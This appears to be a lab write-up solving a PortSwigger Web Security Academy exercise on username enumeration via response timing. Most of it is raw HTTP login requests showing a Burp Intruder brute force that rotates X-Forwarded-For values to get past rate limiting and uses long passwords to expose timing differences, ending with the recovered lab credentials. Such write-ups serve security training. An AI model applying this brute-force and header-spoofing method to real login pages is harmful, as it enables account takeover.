Port Swigger Username enumeration via response tim
Username enumeration via response timing
Solution
Open the website: https://0abd008c04878b31819439f0003f006d.web-security-academy.net/login
https://0abd008c04878b31819439f0003f006d.web-security-academy.net/login
Bruteforce login and password - Intruder
Wordlistes from here --> https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via response timing]
└─$ head -n2 *.txt
==> pass.txt <==
123456
password
==> user.txt <==
carlos
root
Login to the website - fake user and password
I use fake login and password
U: admin
P: fakepass
158ms response
---
POST /login HTTP/2
Host: 0a8a004604c296688102d546007200cf.web-security-academy.net
Cookie: session=mdO0pz3CtQwaZ2v79bI0UCRhPYZhX0zE
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: https://0a8a004604c296688102d546007200cf.web-security-academy.net
Referer: https://0a8a004604c296688102d546007200cf.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=admin&password=fakepass
Login to the website - correct user and password
I use fake login and password
U: wiener
P: peter
144ms response
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&password=peter
Bruteforce login and password
Add 2 payloads:
Payload 1 = numers from 1 to 100 in X-Forwarded-For
Payload 2 = simple list of username in username
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Forwarded-For: 8
Connection: keep-alive
username=mysql&password=fakepasswordfakepasswordfakepasswordfakepasswordfakepasswordfakepasswordfakepassword
Bruteforce login and password second attempt
Edit second payload
Payload 1 = numers from 1 to 100 in X-Forwarded-For
Payload 2 = simple list of password in password
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Forwarded-For: 80
Connection: keep-alive
username=mysql&password=love
Login as username: mysql with password
L: mysql
P: love
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=mysql&password=love
Solved